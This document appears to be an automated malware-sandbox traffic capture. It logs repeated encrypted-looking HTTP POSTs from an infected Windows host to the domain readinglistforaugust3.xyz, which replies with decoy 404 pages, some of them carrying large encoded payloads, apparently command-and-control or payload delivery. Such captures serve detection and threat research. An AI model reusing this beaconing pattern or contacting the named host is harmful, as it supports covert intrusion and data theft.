Aug 24, 2021 08:46:47.709028959 CEST	6703	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:47 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:47.894126892 CEST	6703	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 176 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:47.894179106 CEST	6704	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 24 bc d5 4a 99 47 ba bf dd ca f3 79 Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q$JGye"pEHuK8G/ymQ;{?8W;K'FaWHCSCdd>C
Aug 24, 2021 08:46:47.956705093 CEST	6704	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:47 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:48.758120060 CEST	6705	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 325 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:48.758193016 CEST	6705	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 8e 2b b7 9f ad 6e 2f 5a 6f ce 5d de 66 cc 82 a7 61 34 21 6a 3a a3 e8 51 b5 86 1c 27 bc d5 4a 99 47 ba bf b3 88 9d 3a Data Ascii: lzycZbF}eHRR!#$n<+n/Zo]fa4!j:Q'JG:\\7&^(>VO_EIkbrBcy[SIVHEUdV7Or0E0Mjw=NMOo]g'[k~2
Aug 24, 2021 08:46:48.805993080 CEST	6706	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:48 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:48.982976913 CEST	6706	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:49.066840887 CEST	6708	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 00 00 a6 97 8c b4 08 02 7f 77 08 a7 e7 cb 2c c9 aa 43 96 74 c4 0c 23 20 5b f4 75 62 d6 86 a7 f2 12 bc a9 da 62 b6 a0 d6 8e 2a 03 c1 fe f5 78 80 42 09 22 23 7a 2b 5a be 51 83 37 f3 38 8f fd dd 37 2e 52 8c 23 e2 54 03 2c 1e 64 de 43 81 bc a4 b9 18 d8 e0 a3 e5 f9 b6 3f 7c 68 a0 d4 a1 a7 43 ab 78 a6 8f 31 88 43 72 56 b9 f9 4f 85 d1 73 62 c6 80 7d 19 09 03 aa d1 5f fb 83 4a 56 48 b2 50 68 63 5d d5 06 2d e0 35 ad f9 82 5e f3 8f 10 a3 d2 38 14 32 8f d7 8f 4e 9f 01 be 22 be c7 b7 3e cd 87 45 a3 3a d5 a7 5f 81 cb 05 57 0f 79 93 73 72 62 19 93 b5 34 16 e4 9c 32 11 61 7f 14 ef 78 78 30 be 80 f5 fd 31 4f c6 34 5d ee 71 0a 12 63 f7 cc eb 6b f9 22 4f 87 4a c2 2f b2 87 2e fb bc 06 b1 83 34 6b 27 30 77 1b bd 55 16 4a e2 50 47 9a 0e 3a 54 e9 43 82 e4 64 23 64 77 40 57 91 f8 32 2f 05 d5 6e 93 9a b8 04 64 bf 43 ab 56 7a ea 73 6d f1 d5 54 ce 08 cd f7 dd 52 10 bf 3d 1f c8 e6 c6 c6 89 ba 86 a8 a3 15 4d 81 43 1a ff bc c1 94 52 07 2a 22 af 15 27 78 3a 02 f4 74 c6 51 e5 0d bb 27 32 43 c6 48 f8 87 a9 b2 c7 9e 43 b7 af 83 97 e1 1b d3 98 fe 36 5f 10 62 46 52 ef 25 4c 31 5a 4f 52 54 9f 50 c5 0d 60 47 df 1b 68 d3 df 32 78 1d 2d ce d5 02 04 e7 14 ac f9 cc 13 91 3c 7a 54 c9 45 56 36 06 26 50 da 30 f2 0b 8e 39 cd a8 65 17 92 54 67 f4 c1 ed fe 25 0d 1e 5d ea e8 07 3d 23 da 73 a8 38 36 a1 7f 55 b6 65 c8 f6 7d e0 67 b7 c1 21 4d f3 93 bf e9 ab 1c 91 23 0c 14 be a3 a6 65 79 cc 26 56 7a 39 04 8e b3 6f 2d 65 2a e5 83 cb e7 66 93 f8 bd 03 df d7 2d 12 79 ee 2a 49 e8 a8 25 99 a3 a0 cd 1b 38 c0 83 89 02 ed 02 67 3c d8 23 bc b6 b5 b5 2e 5d fb ed 40 2b 16 18 68 5f 30 6f cb 7b 8e 72 b2 2c e1 26 15 94 a8 14 df c9 8b af 46 34 fa da fb 47 95 27 a3 55 67 50 71 c2 1d 60 74 a5 6c 3c 42 57 eb f4 4e 31 1f 21 3b d7 af 49 27 b5 8c 9a b1 20 59 00 73 38 d0 5f 93 7b 4a 51 69 79 13 99 ea 3a c7 da 53 4f b7 4a 87 66 5e 1a a3 de db 28 ff 67 00 df 63 28 2f 3a b8 76 ea 7c ba 35 23 fc c6 05 07 1b 30 d1 b8 1e 7e 25 1f a5 8b 03 5c dd 49 8e 19 6f f4 e9 15 b7 51 19 e2 de d1 75 05 b3 b2 b6 78 65 55 fc c9 45 ab 3a ad 84 bb 95 5a 09 89 66 30 6e 20 9d d0 ab 44 33 40 97 9d 5c eb 9e 48 04 98 f4 df dc 03 c2 ed 6f 20 82 60 4b 66 3a f8 ab da e0 3d 51 1d 7e 80 bf 3a 68 d6 17 41 c3 ac c3 c8 c9 7f 73 06 0c ba f8 27 83 54 24 f8 e5 cc 78 72 1b 60 a0 69 a3 b3 0d 38 51 b9 f6 12 65 8a 16 3e 1f b1 7a 37 ab d6 bb 35 32 8b 60 44 85 d5 79 e1 34 75 3b 71 9b e3 c0 68 f2 c8 79 8e 6b 4e 87 48 ef 18 e2 39 e1 fa 24 d1 76 58 05 e0 f0 b4 2d 91 6c 38 9f 27 ad 0f 44 94 ac f1 cc e6 60 81 e9 1b 56 1f f5 60 e7 aa 77 77 db e3 73 0d b2 19 1f b7 1c 9a 65 6b 2a 27 6e f8 ee 65 44 50 7f c8 c6 aa e8 a7 4b 5d 7e 8f a5 68 cc f6 2f c9 24 c0 0f 0d e9 41 73 d9 66 56 a2 54 d1 c4 a3 85 4b e7 fc bd 6c 72 1d 78 d5 a3 0d a7 9c 13 58 93 db 14 d8 53 d4 25 5f dd d5 84 e2 46 40 28 66 00 32 25 e3 96 d4 c9 e1 e9 25 7a c7 da 66 30 d8 17 e8 b4 31 e9 32 95 37 23 72 74 1f 87 85 ce bf 87 9d 85 aa fd 27 ba ee 4e 81 22 f5 3f a4 86 cc 87 3b fe e1 39 be 29 e1 6b 8d d3 12 bc ed 9a e3 cf 59 ad 28 e3 83 ac 88 af 0c b7 53 8c 3e 85 ad 3d eb 95 d9 ac d0 90 91 ec b0 70 43 9d 8c 28 3c d6 ef ff e6 84 27 ed e4 8f 3b c2 b8 60 95 39 0f cb dc 34 1d 98 ab d7 ef 55 02 53 49 d9 3f 90 d5 13 d1 74 9f 74 6d d4 ca e1 ac 7d d3 b6 35 5e 71 85 87 db 84 ce 1c f0 7f d0 33 d5 61 1b 51 18 63 7c c2 df 1b 47 f7 a1 1c aa 9b 31 46 a2 d7 9f 5d b9 02 9f 71 60 9c a7 3c 90 c4 13 6e d1 1f 14 dc 3a a1 c5 27 8b 3d 4d 7d 36 bd 05 2a a8 79 e8 45 89 dd 94 5b Data Ascii: 3ff66w,Ct# [ubbxB"#z+ZQ787.R#T,dC?\|hCx1CrVOsb}_JVHPhc]-5^82N">E:_Wysrb42axx01O4]qck"OJ/.4k'0wUJPG:TCd#dw@W2/ndCVzsmTR=MCR"'x:tQ'2CHC6_bFR%L1ZORTP`Gh2x-<zTEV6&P09eTg%]=#s86Ue}g!M#ey&Vz9o-ef-yI%8g<#.]@+h_0o{r,&F4G'UgPq`tl<BWN1!;I' Ys8_{JQiy:SOJf^(gc(/:v\|5#0~%\IoQuxeUE:Zf0n D3@\Ho `Kf:=Q~:hAs'T$xr`i8Qe>z752`Dy4u;qhykNH9$vX-l8'D`V`wwsek'neDPK]~h/$AsfVTKlrxXS%_F@(f2%%zf0127#rt'N"?;9)kY(S>=pC(<';`94USI?ttm}5^q3aQc\|G1F]q`<n:'=M}6yE[
Aug 24, 2021 08:46:50.351943970 CEST	7268	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:50.402746916 CEST	7269	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:50.435883999 CEST	7269	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:50.516021967 CEST	7271	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 00 00 a6 97 8c b4 08 02 7f 77 08 a7 e7 cb 2c c9 aa 43 96 74 c4 0c 23 20 5b f4 75 62 d6 86 a7 f2 12 bc a9 da 62 b6 a0 d6 8e 2a 03 c1 fe f5 78 80 42 09 22 23 7a 2b 5a be 51 83 37 f3 38 8f 9d dd 37 2e 52 8c 23 e2 54 03 2c 1e 64 de 43 81 bc a4 b9 18 d8 e0 a3 e5 f9 b6 3f 7c 68 a0 d4 a1 a7 43 ab 78 a6 8f 31 88 43 72 56 b9 f9 4f 85 d1 73 62 c6 80 7d 19 09 03 aa d1 5f fb 83 4a 56 48 b2 50 68 63 2b 5a da 57 ce 9f 1c d0 10 2e a9 55 72 08 60 11 68 cb a8 fe 10 e5 0f 28 c9 da bf ee 57 83 77 ae 39 18 04 fc fd f4 33 e2 4a 0e ce 50 f6 f8 c0 4b 7b b8 0e 1d fb 4f 6e 1b 6d b8 47 3d 8c d1 ca 19 c6 79 d3 d4 52 e4 74 1d 25 17 52 23 71 c8 45 e5 b9 a2 92 4a 2d 2e f8 eb 2f b2 87 2e f9 bc 46 34 d3 71 7b 27 7c 66 1f bd 15 2f 01 bc 50 57 9a 0e 3a 54 e9 43 72 e4 67 22 6f 76 49 57 91 b4 30 2f b5 14 98 92 cd b8 04 64 6f 1c a3 56 22 d0 73 6d f1 b5 56 ce 08 cd b7 dd 52 00 bf 3d 1f ca e6 c6 c3 09 b2 86 a4 a3 15 4d b4 77 12 ff a0 c1 94 52 07 0a 22 ad 15 23 78 3a 41 86 7e c6 53 e5 0d 3b 27 32 53 c6 48 e8 87 a9 b2 c7 8e 43 b7 bf 83 97 e1 1b d3 98 ee 36 5f 10 62 66 52 ef 2d 4c 31 5a 63 51 57 9f 00 c5 0d 60 4f 1f e4 69 fb ea 32 78 1d 2d ce d5 02 04 e7 14 82 8d a9 6b e5 3c 7a 54 19 51 5e 36 06 06 50 da 50 86 01 8e 25 cf a8 65 17 92 54 67 f4 c1 ed fe 25 0d 1e 5d ca e8 07 5d 0d a8 00 da 5b 36 a1 7f a5 65 67 c8 b6 3d e8 67 b7 ed 21 4d f3 8b b7 e9 ab 7c 93 23 04 16 be a3 a6 65 79 cc 66 56 7a 79 2a fc d6 03 42 06 2a e5 8f cb e7 66 93 78 b5 03 f1 a1 48 6a 0d aa 22 49 f8 e3 27 99 a3 b0 cd 1b 38 8c 81 89 42 e9 02 25 3c d8 23 bc b6 b5 b5 2e 5d fb ed 40 0b 16 18 08 9d 71 03 aa 0f ef 72 b2 98 4f 26 15 96 c8 13 df f9 64 af 46 10 ec d9 fb 46 95 27 a3 df 67 50 77 5e c0 62 74 f1 3a 39 02 79 8f 95 3a 50 1f 21 3b ab 63 b5 26 b5 9c 99 b1 20 0b 06 73 38 d0 5c 93 7b 4a 51 69 79 13 99 ea 3a c7 da 53 0f b7 4a 47 14 2c 46 d1 82 db 68 ff 24 35 e5 63 73 cf 98 b9 63 60 f2 b6 fc e0 7c 56 2b 83 ae c3 12 48 1d 47 ea 0e bf 8e ac 59 4a bb 22 6d c1 df e4 bd be 75 2f d3 b2 cc 9f f9 5b aa cf 25 51 57 30 b6 4c 72 1c 79 df d8 65 7f 63 99 42 eb 31 74 7c 8e 28 c0 49 d1 2a 0c df 0f d3 99 23 9a 7f 4e 0c 96 26 c1 04 f3 87 57 07 c3 09 e8 6d 86 18 33 cc 89 4b 9b 66 94 ef ec d6 37 95 ec 44 41 f5 7f 60 36 04 ba ff 27 83 54 24 f8 e5 cc 7a 5a 0f 61 a0 63 89 b3 0c 28 51 b9 f6 12 63 8a 91 b3 1f a2 4e 37 ab d7 a8 05 3a 8b 62 44 85 d5 79 e1 34 75 2f 5b 9b e3 c1 78 f2 c8 79 8e 6b 4e d2 1d ef 0b d6 39 e1 fb 37 e1 7e 58 07 e0 f0 b4 2d 91 6c 38 8b 0d ad 0f 45 84 ac f1 cc e6 60 81 fe 0c 56 0c c1 60 e7 ab 64 47 d3 e3 71 0d b2 19 1f b7 1c 9a 71 41 2a 27 6f e8 ee 65 44 50 7f c8 f1 9d e8 b4 7f 5d 7e 8e b6 58 c4 f6 2d c9 24 c0 0f 0d e9 41 67 f3 66 56 a3 44 d1 c4 a3 85 4b e7 cb 8a 6c 61 29 78 d5 a2 1e 97 94 13 5a 93 db 14 d8 53 d4 25 4b f7 d5 84 e3 56 40 28 66 00 32 25 d4 a1 d4 da d5 e9 25 7b d4 ea 6e 30 da 17 e8 b4 31 e9 32 95 23 09 72 74 1e 97 85 ce bf 87 9d 85 9d ca 27 a9 da 4e 81 23 e6 0f ac 86 cd 87 3b fe e1 39 be 29 cb 6b 8d d3 13 ac ed 9a e3 cf 59 ad 37 fc 83 b0 bc af 0c b6 40 bc 36 85 ac 3d eb 95 d9 ac d0 90 bb ec b0 70 02 81 8c 28 3c d6 ef ff e6 84 27 ed 5c 88 3b c2 00 67 95 39 1c cb dc 34 29 98 ab d6 f1 57 2a 46 c2 26 60 31 2a a2 35 44 9e 74 6d 75 c2 f0 ef 7d f4 59 bc 1b 80 52 c2 27 84 ce 1c f0 ec e6 23 99 55 98 b1 18 04 46 a0 d5 f1 d4 b6 a1 1c 29 5f 35 ba 93 96 9f 5c 20 47 63 f2 1d 60 a7 40 92 ae 0a b2 4a 22 15 cf 89 6d c1 ad 86 39 5d 3e 36 3e e4 02 a7 fd 2f 44 99 dd 1d de Data Ascii: 3ff66w,Ct# [ubbxB"#z+ZQ787.R#T,dC?\|hCx1CrVOsb}_JVHPhc+ZW.Ur`h(Ww93JPK{OnmG=yRt%R#qEJ-./.F4q{'\|f/PW:TCrg"ovIW0/doV"smVR=MwR"#x:A~S;'2SHC6_bfR-L1ZcQW`Oi2x-k<zTQ^6PP%eTg%]][6eg=g!M\|#eyfVzyBfxHj"I'8B%<#.]@qrO&dFF'gPw^bt:9y:P!;c& s8\{JQiy:SJG,Fh$5csc`\|V+HGYJ"mu/[%QW0LryecB1t\|(I#N&Wm3Kf7DA`6'T$zZac(QcN7:bDy4u/[xykN97~X-l8E`V`dGqqA'oeDP]~X-$AgfVDKla)xZS%KV@(f2%%{n012#rt'N#;9)kY7@6=p(<'\;g94)WF&`1*5Dtmu}YR'#UF)_5\ Gc`@J"m9]>6>/D
Aug 24, 2021 08:46:51.660223007 CEST	7916	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 292 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:51.707551956 CEST	7917	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:51.766654968 CEST	7918	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 221 Host: readinglistforaugust3.xyz
